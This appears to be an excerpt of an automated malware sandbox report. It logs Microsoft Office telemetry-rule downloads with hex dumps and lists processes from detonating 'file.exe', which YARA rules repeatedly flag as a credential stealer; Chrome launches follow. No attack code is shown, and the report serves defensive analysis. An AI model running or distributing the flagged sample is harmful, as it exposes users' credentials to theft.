                                                                                                                                                                                                2024-11-20 09:54:39 UTC192OUTGET /rules/rule700150v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:39 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1362
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE54CA33F"
                                                                                                                                                                                                x-ms-request-id: e99758fe-d01e-0065-348c-3ab77a000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095439Z-r1d97b995774n5h6hC1TEBvf8400000008p0000000007cut
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:39 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 31 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 6e 65 4e 6f 74 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 6e 65 4e 6f 74 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700150" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OneNote" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOneNote" S="Medium" /> <F T="2">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                147192.168.2.74985413.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:40 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:40 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1409
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                ETag: "0x8DC582BDFC438CF"
                                                                                                                                                                                                x-ms-request-id: 6d467d74-a01e-0050-5286-3adb6e000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095440Z-1777c6cb754mrj2shC1TEB6k7w00000009n00000000035r4
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:40 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                148192.168.2.74985513.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:40 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:40 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1372
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE6669CA7"
                                                                                                                                                                                                x-ms-request-id: f2376ea7-e01e-000c-078c-3a8e36000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095440Z-r1d97b99577n5jhbhC1TEB74vn00000008t00000000000cw
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:40 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                149192.168.2.74985613.107.246.45443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-20 09:54:40 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-20 09:54:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Wed, 20 Nov 2024 09:54:40 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 1408
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582BE1038EF2"
                                                                                                                                                                                                x-ms-request-id: c1a202f8-901e-005b-118c-3a2005000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241120T095440Z-1777c6cb754j8gqphC1TEB5bf800000009a000000000a7v3
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-20 09:54:40 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:04:54:16
                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                Imagebase:0x860000
                                                                                                                                                                                                File size:1'858'560 bytes
                                                                                                                                                                                                MD5 hash:C295093AA18965205A72349F476A9CF3
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1382418436.000000000117B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1399975749.0000000001180000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1385490600.0000000001180000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1428721600.0000000001180000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1384589859.0000000001180000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1399651193.000000000117F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1399139750.000000000117F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:04:54:42
                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                Imagebase:0x7ff6c4390000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:04:54:42
                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2120 --field-trial-handle=2004,i,10944876540401575079,9840924559391252716,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                Imagebase:0x7ff6c4390000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:04:54:48
                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                                                                                                                                                                                                Imagebase:0x7ff6c4390000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:04:54:48
                                                                                                                                                                                                Start date:20/11/2024
                                                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1908,i,6104721456568846231,4380768281653123136,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                Imagebase:0x7ff6c4390000
                                                                                                                                                                                                File size:3'242'272 bytes
                                                                                                                                                                                                MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                No disassembly